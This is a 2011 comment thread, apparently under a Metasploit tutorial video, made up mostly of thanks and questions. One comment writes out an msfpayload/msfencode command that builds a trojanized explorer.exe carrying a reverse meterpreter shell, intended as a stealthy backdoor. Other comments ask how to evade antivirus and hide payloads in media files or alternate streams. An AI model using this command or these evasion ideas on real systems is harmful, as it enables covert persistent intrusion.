ST

matan.mazursky on Sat 12 Mar 2011

These tutorials are fantastic, I appreciate how you face the problems and errors that show up during your demos and make sure that what you wanted to happen does happen no matter what.
Do you think metasploit could take advantage of alternative streams to place the backdoor in a template, keep its properties, and remain hidden?

ehloworld on Thu 07 Apr 2011

Another excellent job.

I used this exploit on a few windows os, windows 7 with patch and windows xp. works perfect with anti-virus disabled and if i allow bind_tcp_encoded through zonealarm.

What i need to find out is;
If there's a way not to trigger an alarm by AV.

Danladi on Tue 17 May 2011

Hey Vivek,
Love the vids man, keep up the great work! We used your buffer overflow set of primer videos extensively during a university project on buffer overflows. Really helped us out there :)
After looking over the section on persistence and metsvc, I wasn't really happy with these as backdoor solutions from a counter-forensics point of view. Creating additional files in the filesystem just isn't stealth enough for me! ;)

This video in particular got me thinking of backdoors from a different point of view. My plan is to use the final technique in this video to encode a meterpreter reverse shell into the regularly used explorer.exe. The theory being that when the atacker has control of the system, they replace C:\WINDOWS\explorer.exe with the malicious executeable, maintaining the functionality of explorer.exe but with an added shiny new reverse meterpreter shell...

Well, I did some playing about and successfully created the new executeable with the following command:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.2 R | msfencode -e x86/shikata_ga_nai -t exe -x explorer.exe -o ~/explorer.exe -k

This was a good start and I was able to get a meterpreter session providing the listener was running on the attacker side.

The problem I encountered was as follows: If a listener is present on the hacker machine, a remote meterpreter shell is achieved and explorer behaves as normal. However if a listener is not present, explorer immediately crashes and restarts. This happens repeatedly every 2-3 seconds! Obviously from a stealth perspective this completely failed! haha! Any ideas what is happening here buddy? Is there any way to avoid this or should I forget about explorer.exe and pick a less critical exe? My main thought was that explorer.exe is always run, and is thus a reliable backdoor...
Thanks mate, hope all is well,

Dan

DW2054 on Tue 21 Jun 2011

Great video as always. Keep it up.

xplt on Wed 27 Jul 2011

Another great megaprimer! Thanks for sharing all of this! o/

p0wnStar on Tue 04 Oct 2011

Thanks for the effort Vivek !!

Qn: My wishlist is for msfencoder to encode the payload in other format such as *.avi and *.mp3. The payload should be embedded in such a way that the *.avi still get executed along with the payload.

No alarms there !! Is it possible Vivek ??

SecurityTube_Bot on Tue 22 Nov 2011

Thanks for all the comments guys! We have launched a SecurityTube Metasploit Framework Expert Certification today:

http://www.securitytube.net/smfe

The first 25 signups will receive discounted seats! Please hurry :)

AlanMenezes on Sat 14 Jan 2012

Para conhecer o metasploit mais a fundo visite o fórum Amantes do Metasploit
http://www.amantesdometasploit.com.br

AlanMenezes on Sat 14 Jan 2012

Para conhecer o metasploit mais a fundo visite o fórum Amantes do Metasploit, lá você vai encontrar muito material em português
http://www.amantesdometasploit.com.br

Keith on Mon 05 Mar 2012

Hi Vivek, I'm loving all the video. I love this one too going from the port scanning to exploitation was a bit quick, it's not just you all the tutorials I've seen or read go something like; "ok we scan the host and see port n open so we deploy xyz exploit". How do you find out which exploit to use, is it just experience, surly even you can't know every exploit ever written.
It's a tiny thing love the videos, the quality is way higher that most I have seen. Thanks.